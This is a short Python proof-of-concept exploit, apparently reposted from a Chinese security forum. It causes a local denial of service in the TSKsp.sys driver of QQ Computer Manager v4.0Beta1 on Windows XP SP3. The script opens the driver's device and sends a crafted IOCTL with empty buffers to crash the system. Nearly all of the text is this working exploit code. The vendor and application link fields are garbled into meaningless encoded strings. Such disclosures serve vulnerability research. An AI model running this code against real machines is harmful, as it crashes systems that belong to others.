#!/usr/bin/python  

   

#################################################################  

#  

# Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit  

# Author: Lufeng Li of Neusoft Corporation  

# Vendor: 1b0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8U0L8h3N6J5i4K6u0W2M7i4q4Q4x3X3g2U0L8$3#2Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.

# Vulnerable App: 78aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8D9i4K6g2X3k6r3W2J5x3W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3K9h3&6$3j5#2)9J5c8Y4q4I4L8h3q4K6N6r3g2J5i4K6u0r3M7$3g2@1N6i4m8Q4x3V1k6c8f1g2m8o6e0h3N6J5i4K6g2X3f1$3g2@1N6i4m8Q4x3X3g2W2P5r3g2Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.

# Platform: Windows XPSP3 Chinese Simplified  

# Tested: QQpcmgr v4.0Beta1  

# Vulnerable: QQpcmgr<=v4.0Beta1  

#   

#################################################################  

from ctypes import *

   

kernel32 = windll.kernel32  

Psapi    = windll.Psapi  

   

if __name__ == '__main__':  

    GENERIC_READ  = 0x80000000

    GENERIC_WRITE = 0x40000000

    OPEN_EXISTING = 0x3

    CREATE_ALWAYS = 0x2

   

    DEVICE_NAME   = "\\\\.\\tsksp"

    dwReturn      = c_ulong()  

    out_data      = ''  

    in_data       = ''  

    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,  

                        0, None, CREATE_ALWAYS, 0, None)  

    dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data,0, out_data, 0,byref(dwReturn), None)

[培训]传播安全知识、拓宽行业人脉——看雪讲师团队等你加入！